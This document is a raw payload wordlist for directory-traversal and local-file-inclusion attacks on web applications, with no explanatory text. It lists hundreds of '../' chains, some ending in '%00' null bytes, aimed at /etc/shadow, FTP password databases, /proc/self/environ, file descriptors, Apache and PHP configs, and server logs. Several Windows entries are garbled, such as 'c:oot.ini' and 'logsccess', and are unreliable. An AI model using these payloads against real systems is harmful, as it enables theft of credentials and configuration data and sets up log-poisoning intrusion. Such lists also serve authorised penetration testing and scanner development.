/usr/local/pureftpd/etc/pureftpd.pdb
../../../../../../../../../../usr/local/pureftpd/etc/pureftpd.pdb%00
/usr/local/pureftpd/etc/pureftpd.pdb%00
../../../../../../../../../../usr/local/pureftpd/sbin/pure-config.pl
/usr/local/pureftpd/sbin/pure-config.pl
../../../../../../../../../../usr/local/pureftpd/sbin/pure-config.pl%00
/usr/local/pureftpd/sbin/pure-config.pl%00
../../../../../../../../../../usr/local/Zend/etc/php.ini
/usr/local/Zend/etc/php.ini
../../../../../../../../../../usr/local/Zend/etc/php.ini%00
/usr/local/Zend/etc/php.ini%00
../../../../../../../../../../usr/pkgsrc/net/pureftpd/
/usr/pkgsrc/net/pureftpd/
../../../../../../../../../../usr/pkgsrc/net/pureftpd/%00
/usr/pkgsrc/net/pureftpd/%00
../../../../../../../../../../usr/ports/contrib/pure-ftpd/
/usr/ports/contrib/pure-ftpd/
../../../../../../../../../../usr/ports/contrib/pure-ftpd/%00
/usr/ports/contrib/pure-ftpd/%00
../../../../../../../../../../usr/ports/ftp/pure-ftpd/
/usr/ports/ftp/pure-ftpd/
../../../../../../../../../../usr/ports/ftp/pure-ftpd/%00
/usr/ports/ftp/pure-ftpd/%00
../../../../../../../../../../usr/ports/net/pure-ftpd/
/usr/ports/net/pure-ftpd/
../../../../../../../../../../usr/ports/net/pure-ftpd/%00
/usr/ports/net/pure-ftpd/%00
../../../../../../../../../../usr/sbin/pure-config.pl
/usr/sbin/pure-config.pl
../../../../../../../../../../usr/sbin/pure-config.pl%00
/usr/sbin/pure-config.pl%00
/etc/apache2/conf/httpd.conf
../../../../../../../../../../etc/apache2/conf/httpd.conf%00
/etc/apache2/conf/httpd.conf%00
../../../../../../../../../../etc/apache2/httpd.conf
/etc/apache2/httpd.conf
../../../../../../../../../../etc/apache2/httpd.conf%00
/etc/apache2/httpd.conf%00
../../../../../../../../../../etc/apache/conf/httpd.conf
/etc/apache/conf/httpd.conf
../../../../../../../../../../etc/apache/conf/httpd.conf%00
/etc/apache/conf/httpd.conf%00
../../../../../../../../../../etc/chrootUsers
/etc/chrootUsers
../../../../../../../../../../etc/chrootUsers%00
/etc/chrootUsers%00
../../../../../../../../../../etc/ftpchroot
/etc/ftpchroot
../../../../../../../../../../etc/ftpchroot%00
/etc/ftpchroot%00
../../../../../../../../../../etc/ftphosts
/etc/ftphosts
../../../../../../../../../../etc/ftphosts%00
/etc/ftphosts%00
../../../../../../../../../../etc/group
/etc/group
../../../../../../../../../../etc/group%00
/etc/group%00
../../../../../../../../../../etc/http/conf/httpd.conf
/etc/http/conf/httpd.conf
../../../../../../../../../../etc/http/conf/httpd.conf%00
/etc/http/conf/httpd.conf%00
../../../../../../../../../../etc/httpd.conf
/etc/httpd.conf
../../../../../../../../../../etc/httpd.conf%00
/etc/httpd.conf%00
../../../../../../../../../../etc/httpd/conf/httpd.conf
/etc/httpd/conf/httpd.conf
../../../../../../../../../../etc/httpd/conf/httpd.conf%00
/etc/httpd/conf/httpd.conf%00
../../../../../../../../../../etc/httpd/httpd.conf
/etc/httpd/httpd.conf
../../../../../../../../../../etc/httpd/httpd.conf%00
/etc/httpd/httpd.conf%00
../../../../../../../../../../etc/httpd/logs/access.log
../../../../../../../../../../etc/httpd/logs/access
../../../../../../../../../../etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/access
/etc/httpd/logs/access_log
../../../../../../../../../../etc/httpd/logs/access.log%00
../../../../../../../../../../etc/httpd/logs/access%00
../../../../../../../../../../etc/httpd/logs/access_log%00
/etc/httpd/logs/access.log%00
/etc/httpd/logs/access%00
/etc/httpd/logs/access_log%00
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../etc/httpd/logs/error
../../../../../../../../../../etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error
/etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log%00
../../../../../../../../../../etc/httpd/logs/error%00
../../../../../../../../../../etc/httpd/logs/error_log%00
/etc/httpd/logs/error.log%00
/etc/httpd/logs/error%00
/etc/httpd/logs/error_log%00
../../../../../../../../../../etc/httpd/php.ini
/etc/httpd/php.ini
../../../../../../../../../../etc/httpd/php.ini%00
/etc/httpd/php.ini%00
../../../../../../../../../../etc/http/httpd.conf
/etc/http/httpd.conf
../../../../../../../../../../etc/http/httpd.conf%00
/etc/http/httpd.conf%00
../../../../../../../../../../etc/logrotate.d/ftp
/etc/logrotate.d/ftp
../../../../../../../../../../etc/logrotate.d/ftp%00
/etc/logrotate.d/ftp%00
../../../../../../../../../../etc/logrotate.d/proftpd
/etc/logrotate.d/proftpd
../../../../../../../../../../etc/logrotate.d/proftpd%00
/etc/logrotate.d/proftpd%00
../../../../../../../../../../etc/logrotate.d/vsftpd.log
../../../../../../../../../../etc/logrotate.d/vsftpd
/etc/logrotate.d/vsftpd.log
/etc/logrotate.d/vsftpd
../../../../../../../../../../etc/logrotate.d/vsftpd.log%00
../../../../../../../../../../etc/logrotate.d/vsftpd%00
/etc/logrotate.d/vsftpd.log%00
/etc/logrotate.d/vsftpd%00
../../../../../../../../../../etc/my.cnf
/etc/my.cnf
../../../../../../../../../../etc/my.cnf%00
/etc/my.cnf%00
../../../../../../../../../../etc/mysql/my.cnf
/etc/mysql/my.cnf
../../../../../../../../../../etc/mysql/my.cnf%00
/etc/mysql/my.cnf%00
../../../../../../../../../../etc/php4.4/fcgi/php.ini
/etc/php4.4/fcgi/php.ini
../../../../../../../../../../etc/php4.4/fcgi/php.ini%00
/etc/php4.4/fcgi/php.ini%00
../../../../../../../../../../etc/php4/apache2/php.ini
/etc/php4/apache2/php.ini
../../../../../../../../../../etc/php4/apache2/php.ini%00
/etc/php4/apache2/php.ini%00
../../../../../../../../../../etc/php4/apache/php.ini
/etc/php4/apache/php.ini
../../../../../../../../../../etc/php4/apache/php.ini%00
/etc/php4/apache/php.ini%00
../../../../../../../../../../etc/php4/cgi/php.ini
/etc/php4/cgi/php.ini
../../../../../../../../../../etc/php4/cgi/php.ini%00
/etc/php4/cgi/php.ini%00
../../../../../../../../../../etc/php5/apache2/php.ini
/etc/php5/apache2/php.ini
../../../../../../../../../../etc/php5/apache2/php.ini%00
/etc/php5/apache2/php.ini%00
../../../../../../../../../../etc/php5/apache/php.ini
/etc/php5/apache/php.ini
../../../../../../../../../../etc/php5/apache/php.ini%00
/etc/php5/apache/php.ini%00
../../../../../../../../../../etc/php5/cgi/php.ini
/etc/php5/cgi/php.ini
../../../../../../../../../../etc/php5/cgi/php.ini%00
/etc/php5/cgi/php.ini%00
../../../../../../../../../../etc/php/apache2/php.ini
/etc/php/apache2/php.ini
../../../../../../../../../../etc/php/apache2/php.ini%00
/etc/php/apache2/php.ini%00
../../../../../../../../../../etc/php/apache/php.ini
/etc/php/apache/php.ini
../../../../../../../../../../etc/php/apache/php.ini%00
/etc/php/apache/php.ini%00
../../../../../../../../../../etc/php/cgi/php.ini
/etc/php/cgi/php.ini
../../../../../../../../../../etc/php/cgi/php.ini%00
/etc/php/cgi/php.ini%00
../../../../../../../../../../etc/php.ini
/etc/php.ini
../../../../../../../../../../etc/php.ini%00
/etc/php.ini%00
../../../../../../../../../../etc/php/php4/php.ini
/etc/php/php4/php.ini
../../../../../../../../../../etc/php/php4/php.ini%00
/etc/php/php4/php.ini%00
../../../../../../../../../../etc/php/php.ini
/etc/php/php.ini
../../../../../../../../../../etc/php/php.ini%00
/etc/php/php.ini%00
../../../../../../../../../../etc/proftp.conf
/etc/proftp.conf
../../../../../../../../../../etc/proftp.conf%00
/etc/proftp.conf%00
../../../../../../../../../../etc/proftpd/modules.conf
/etc/proftpd/modules.conf
../../../../../../../../../../etc/proftpd/modules.conf%00
/etc/proftpd/modules.conf%00
../../../../../../../../../../etc/protpd/proftpd.conf
/etc/protpd/proftpd.conf
../../../../../../../../../../etc/protpd/proftpd.conf%00
/etc/protpd/proftpd.conf%00
../../../../../../../../../../etc/pureftpd.passwd
/etc/pureftpd.passwd
../../../../../../../../../../etc/pureftpd.passwd%00
/etc/pureftpd.passwd%00
../../../../../../../../../../etc/pureftpd.pdb
/etc/pureftpd.pdb
../../../../../../../../../../etc/pureftpd.pdb%00
/etc/pureftpd.pdb%00
../../../../../../../../../../etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.conf
../../../../../../../../../../etc/pure-ftpd/pure-ftpd.conf%00
/etc/pure-ftpd/pure-ftpd.conf%00
../../../../../../../../../../etc/pure-ftpd/pure-ftpd.pdb
../../../../../../../../../../etc/pure-ftpd/pureftpd.pdb
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/pureftpd.pdb
../../../../../../../../../../etc/pure-ftpd/pure-ftpd.pdb%00
../../../../../../../../../../etc/pure-ftpd/pureftpd.pdb%00
/etc/pure-ftpd/pure-ftpd.pdb%00
/etc/pure-ftpd/pureftpd.pdb%00
../../../../../../../../../../etc/security/environ
/etc/security/environ
../../../../../../../../../../etc/security/environ%00
/etc/security/environ%00
../../../../../../../../../../etc/security/group
/etc/security/group
../../../../../../../../../../etc/security/group%00
/etc/security/group%00
../../../../../../../../../../etc/security/limits
/etc/security/limits
../../../../../../../../../../etc/security/limits%00
/etc/security/limits%00
../../../../../../../../../../etc/security/passwd
/etc/security/passwd
../../../../../../../../../../etc/security/passwd%00
/etc/security/passwd%00
../../../../../../../../../../etc/security/user
/etc/security/user
../../../../../../../../../../etc/security/user%00
/etc/security/user%00
../../../../../../../../../../etc/shadow
/etc/shadow
../../../../../../../../../../etc/shadow%00
/etc/shadow%00
../../../../../../../../../../etc/vhcs2/proftpd/proftpd.conf
/etc/vhcs2/proftpd/proftpd.conf
../../../../../../../../../../etc/vhcs2/proftpd/proftpd.conf%00
/etc/vhcs2/proftpd/proftpd.conf%00
../../../../../../../../../../etc/vsftpd.chroot_list
/etc/vsftpd.chroot_list
../../../../../../../../../../etc/vsftpd.chroot_list%00
/etc/vsftpd.chroot_list%00
../../../../../../../../../../etc/vsftpd.conf
/etc/vsftpd.conf
../../../../../../../../../../etc/vsftpd.conf%00
/etc/vsftpd.conf%00
../../../../../../../../../../etc/vsftpd/vsftpd.conf
/etc/vsftpd/vsftpd.conf
../../../../../../../../../../etc/vsftpd/vsftpd.conf%00
/etc/vsftpd/vsftpd.conf%00
../../../../../../../../../../etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftpaccess
../../../../../../../../../../etc/wu-ftpd/ftpaccess%00
/etc/wu-ftpd/ftpaccess%00
../../../../../../../../../../etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftphosts
../../../../../../../../../../etc/wu-ftpd/ftphosts%00
/etc/wu-ftpd/ftphosts%00
../../../../../../../../../../etc/wu-ftpd/ftpusers
/etc/wu-ftpd/ftpusers
../../../../../../../../../../etc/wu-ftpd/ftpusers%00
/etc/wu-ftpd/ftpusers%00
../../../../../../../../../..Files/Apache
Files/Apache
../../../../../../../../../..Files/xampp/apache/conf/httpd.conf
Files/xampp/apache/conf/httpd.conf
../../../../../../../../../..Files/xampp/apache/conf/httpd.conf%00
Files/xampp/apache/conf/httpd.conf%00
../../../../../../../../../..Group/Apache2/conf/httpd.conf
Group/Apache2/conf/httpd.conf
../../../../../../../../../..Group/Apache2/conf/httpd.conf%00
Group/Apache2/conf/httpd.conf%00
../../../../../../../../../..Group/Apache/conf/httpd.conf
Group/Apache/conf/httpd.conf
../../../../../../../../../..Group/Apache/conf/httpd.conf%00
Group/Apache/conf/httpd.conf%00
../../../../../../../../../..Group/Apache/logs/access.log
../../../../../../../../../..Group/Apache/logs/access
Group/Apache/logs/access.log
Group/Apache/logs/access
../../../../../../../../../..Group/Apache/logs/access.log%00
../../../../../../../../../..Group/Apache/logs/access%00
Group/Apache/logs/access.log%00
Group/Apache/logs/access%00
../../../../../../../../../..Group/Apache/logs/error.log
../../../../../../../../../..Group/Apache/logs/error
Group/Apache/logs/error.log
Group/Apache/logs/error
../../../../../../../../../..Group/Apache/logs/error.log%00
../../../../../../../../../..Group/Apache/logs/error%00
Group/Apache/logs/error.log%00
Group/Apache/logs/error%00
../../../../../../../../../../home2/bin/stable/apache/php.ini
/home2/bin/stable/apache/php.ini
../../../../../../../../../../home2/bin/stable/apache/php.ini%00
/home2/bin/stable/apache/php.ini%00
../../../../../../../../../../home/bin/stable/apache/php.ini
/home/bin/stable/apache/php.ini
../../../../../../../../../../home/bin/stable/apache/php.ini%00
/home/bin/stable/apache/php.ini%00
/php4/php.ini
../../../../../../../../../../php4/php.ini%00
/php4/php.ini%00
../../../../../../../../../../php5/php.ini
/php5/php.ini
../../../../../../../../../../php5/php.ini%00
/php5/php.ini%00
../../../../../../../../../../php/php.ini
/php/php.ini
../../../../../../../../../../PHP/php.ini
/PHP/php.ini
../../../../../../../../../../php/php.ini%00
/php/php.ini%00
../../../../../../../../../../PHP/php.ini%00
/PHP/php.ini%00
../../../../../../../../../../private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf
../../../../../../../../../../private/etc/httpd/httpd.conf%00
/private/etc/httpd/httpd.conf%00
../../../../../../../../../../private/etc/httpd/httpd.conf.default
/private/etc/httpd/httpd.conf.default
../../../../../../../../../../private/etc/httpd/httpd.conf.default%00
/private/etc/httpd/httpd.conf.default%00
../../../../../../../../../../proc/self/cmdline
/proc/self/cmdline
../../../../../../../../../../proc/self/cmdline%00
/proc/self/cmdline%00
../../../../../../../../../../proc/self/environ
/proc/self/environ
../../../../../../../../../../proc/self/environ%00
/proc/self/environ%00
../../../../../../../../../../proc/self/environ%00%00
/proc/self/environ%00%00
../../../../../../../../../../proc/self/fd/0
/proc/self/fd/0
../../../../../../../../../../proc/self/fd/0%00
/proc/self/fd/0%00
../../../../../../../../../../proc/self/fd/1
/proc/self/fd/1
../../../../../../../../../../proc/self/fd/10
/proc/self/fd/10
../../../../../../../../../../proc/self/fd/1%00
/proc/self/fd/1%00
../../../../../../../../../../proc/self/fd/10%00
/proc/self/fd/10%00
../../../../../../../../../../proc/self/fd/11
/proc/self/fd/11
../../../../../../../../../../proc/self/fd/11%00
/proc/self/fd/11%00
../../../../../../../../../../proc/self/fd/12
/proc/self/fd/12
../../../../../../../../../../proc/self/fd/12%00
/proc/self/fd/12%00
../../../../../../../../../../proc/self/fd/13
/proc/self/fd/13
../../../../../../../../../../proc/self/fd/13%00
/proc/self/fd/13%00
../../../../../../../../../../proc/self/fd/14
/proc/self/fd/14
../../../../../../../../../../proc/self/fd/14%00
/proc/self/fd/14%00
../../../../../../../../../../proc/self/fd/15
/proc/self/fd/15
../../../../../../../../../../proc/self/fd/15%00
/proc/self/fd/15%00
../../../../../../../../../../proc/self/fd/16
/proc/self/fd/16
../../../../../../../../../../proc/self/fd/16%00
/proc/self/fd/16%00
../../../../../../../../../../proc/self/fd/17
/proc/self/fd/17
../../../../../../../../../../proc/self/fd/17%00
/proc/self/fd/17%00
../../../../../../../../../../proc/self/fd/18
/proc/self/fd/18
../../../../../../../../../../proc/self/fd/18%00
/proc/self/fd/18%00
../../../../../../../../../../proc/self/fd/19
/proc/self/fd/19
../../../../../../../../../../proc/self/fd/19%00
/proc/self/fd/19%00
../../../../../../../../../../proc/self/fd/2
/proc/self/fd/2
../../../../../../../../../../proc/self/fd/20
/proc/self/fd/20
../../../../../../../../../../proc/self/fd/2%00
/proc/self/fd/2%00
../../../../../../../../../../proc/self/fd/20%00
/proc/self/fd/20%00
../../../../../../../../../../proc/self/fd/21
/proc/self/fd/21
../../../../../../../../../../proc/self/fd/21%00
/proc/self/fd/21%00
../../../../../../../../../../proc/self/fd/22
/proc/self/fd/22
../../../../../../../../../../proc/self/fd/22%00
/proc/self/fd/22%00
../../../../../../../../../../proc/self/fd/23
/proc/self/fd/23
../../../../../../../../../../proc/self/fd/23%00
/proc/self/fd/23%00
../../../../../../../../../../proc/self/fd/24
/proc/self/fd/24
../../../../../../../../../../proc/self/fd/24%00
/proc/self/fd/24%00
../../../../../../../../../../proc/self/fd/25
/proc/self/fd/25
../../../../../../../../../../proc/self/fd/25%00
/proc/self/fd/25%00
../../../../../../../../../../proc/self/fd/26
/proc/self/fd/26
../../../../../../../../../../proc/self/fd/26%00
/proc/self/fd/26%00
../../../../../../../../../../proc/self/fd/27
/proc/self/fd/27
../../../../../../../../../../proc/self/fd/27%00
/proc/self/fd/27%00
../../../../../../../../../../proc/self/fd/28
/proc/self/fd/28
../../../../../../../../../../proc/self/fd/28%00
/proc/self/fd/28%00
../../../../../../../../../../proc/self/fd/29
/proc/self/fd/29
../../../../../../../../../../proc/self/fd/29%00
/proc/self/fd/29%00
../../../../../../../../../../proc/self/fd/3
/proc/self/fd/3
../../../../../../../../../../proc/self/fd/30
/proc/self/fd/30
../../../../../../../../../../proc/self/fd/3%00
/proc/self/fd/3%00
../../../../../../../../../../proc/self/fd/30%00
/proc/self/fd/30%00
../../../../../../../../../../proc/self/fd/31
/proc/self/fd/31
../../../../../../../../../../proc/self/fd/31%00
/proc/self/fd/31%00
../../../../../../../../../../proc/self/fd/32
/proc/self/fd/32
../../../../../../../../../../proc/self/fd/32%00
/proc/self/fd/32%00
../../../../../../../../../../proc/self/fd/33
/proc/self/fd/33
../../../../../../../../../../proc/self/fd/33%00
/proc/self/fd/33%00
../../../../../../../../../../proc/self/fd/34
/proc/self/fd/34
../../../../../../../../../../proc/self/fd/34%00
/proc/self/fd/34%00
../../../../../../../../../../proc/self/fd/35
/proc/self/fd/35
../../../../../../../../../../proc/self/fd/35%00
/proc/self/fd/35%00
../../../../../../../../../../proc/self/fd/4
/proc/self/fd/4
../../../../../../../../../../proc/self/fd/4%00
/proc/self/fd/4%00
../../../../../../../../../../proc/self/fd/5
/proc/self/fd/5
../../../../../../../../../../proc/self/fd/5%00
/proc/self/fd/5%00
../../../../../../../../../../proc/self/fd/6
/proc/self/fd/6
../../../../../../../../../../proc/self/fd/6%00
/proc/self/fd/6%00
../../../../../../../../../../proc/self/fd/7
/proc/self/fd/7
../../../../../../../../../../proc/self/fd/7%00
/proc/self/fd/7%00
../../../../../../../../../../proc/self/fd/8
/proc/self/fd/8
../../../../../../../../../../proc/self/fd/8%00
/proc/self/fd/8%00
../../../../../../../../../../proc/self/fd/9
/proc/self/fd/9
../../../../../../../../../../proc/self/fd/9%00
/proc/self/fd/9%00
../../../../../../../../../../proc/self/stat
/proc/self/stat
../../../../../../../../../../proc/self/stat%00
/proc/self/stat%00
../../../../../../../../../../proc/self/status
/proc/self/status
../../../../../../../../../../proc/self/status%00
/proc/self/status%00
../../../../../../../../../../Program
/Program
c:\windows\system32\drivers\etc\hosts
c:/boot.ini
c:oot.ini
C:/boot.ini
C:oot.ini
../../../../../../../../../../Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
../../../../../../../../../../Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf%00
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf%00
../../../../../../../../../../Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
../../../../../../../../../../Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf%00
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf%00
../../../../../../../../../../Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
../../../../../../../../../../Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf%00
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf%00
../../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
../../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php%00
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php%00
../../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
../../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php%00
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php%00
../../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
../../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php%00
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php%00
../../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
../../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/lib/php.ini%00
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini%00
../../../../../../../../../../Volumes/webBackup/opt/apache2/conf/httpd.conf
/Volumes/webBackup/opt/apache2/conf/httpd.conf
../../../../../../../../../../Volumes/webBackup/opt/apache2/conf/httpd.conf%00
/Volumes/webBackup/opt/apache2/conf/httpd.conf%00
../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf
../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf%00
/Volumes/webBackup/private/etc/httpd/httpd.conf%00
../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf.default
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf.default%00
/Volumes/webBackup/private/etc/httpd/httpd.conf.default%00
../../../../../../../../../../web/conf/php.ini
/web/conf/php.ini
../../../../../../../../../../web/conf/php.ini%00
/web/conf/php.ini%00
../../../../../../../../../../WINDOWS/php.ini
/WINDOWS/php.ini
../../../../../../../../../../WINDOWS/php.ini%00
/WINDOWS/php.ini%00
../../../../../../../../../../WINNT/php.ini
/WINNT/php.ini
../../../../../../../../../../WINNT/php.ini%00
/WINNT/php.ini%00
../../../../../../../../../../www/logs/proftpd.system.log
../../../../../../../../../../www/logs/proftpd.system
/www/logs/proftpd.system.log
/www/logs/proftpd.system
../../../../../../../../../../www/logs/proftpd.system.log%00
../../../../../../../../../../www/logs/proftpd.system%00
/www/logs/proftpd.system.log%00
/www/logs/proftpd.system%00
../../../../../../../../../../xampp/apache/bin/php.ini
/xampp/apache/bin/php.ini
../../../../../../../../../../xampp/apache/bin/php.ini%00
/xampp/apache/bin/php.ini%00
c:/wamp/logs/access.log
c:/wamp/logs/access
c:\xampp\apache\logs\access.log
c:\xampp\apache\logs\error.log
c:\wamp\logsccess.log
c:\wamp\logsccess
C:/wamp/logs/access.log
C:/wamp/logs/access
C:\wamp\logsccess.log
C:\wamp\logsccess
C:/WAMP/logs/access.log
C:/WAMP/logs/access
c:/xampp/logs/access.log
c:/xampp/logs/access
c:/XAMPP/logs/access.log
c:/XAMPP/logs/access
c:\XAMPP\logsccess.log
c:\XAMPP\logsccess
C:/xampp/logs/access.log
C:/xampp/logs/access
C:\xampp\logsccess.log
C:\xampp\logsccess
C:/XAMPP/logs/access.log
C:/XAMPP/logs/access
C:\XAMPP\logsccess.log
C:\XAMPP\logsccess
d:/boot.ini
d:oot.ini
D:/boot.ini
D:oot.ini
d:/wamp/logs/access.log
d:/wamp/logs/access
d:\wamp\logsccess.log
d:\wamp\logsccess
D:/wamp/logs/access.log
D:/wamp/logs/access
D:\wamp\logsccess.log
D:\wamp\logsccess
D:/WAMP/logs/access.log
D:/WAMP/logs/access
d:/xampp/logs/access.log
d:/xampp/logs/access
d:/XAMPP/logs/access.log
d:/XAMPP/logs/access
d:\XAMPP\logsccess.log
d:\XAMPP\logsccess
D:/xampp/logs/access.log
D:/xampp/logs/access
D:\xampp\logsccess.log
D:\xampp\logsccess
D:/XAMPP/logs/access.log
D:/XAMPP/logs/access
D:\XAMPP\logsccess.log
D:\XAMPP\logsccess
